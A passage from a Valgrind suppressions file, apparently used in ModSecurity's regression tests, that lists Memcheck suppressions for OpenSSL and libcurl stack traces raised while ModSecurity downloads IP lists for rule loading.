obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_num_bits_word fun:BN_num_bits fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_num_bits_word fun:BN_num_bits fun:BN_bn2bin fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Param write(buf) obj:/usr/lib/libc-2.24.so fun:sock_write fun:BIO_write fun:buffer_ctrl fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memset fun:BUF_MEM_grow_clean fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memset fun:BUF_MEM_grow_clean fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Param write(buf) obj:/usr/lib/libc-2.24.so fun:sock_write fun:BIO_write fun:ssl3_write_pending fun:ssl3_write_bytes obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform 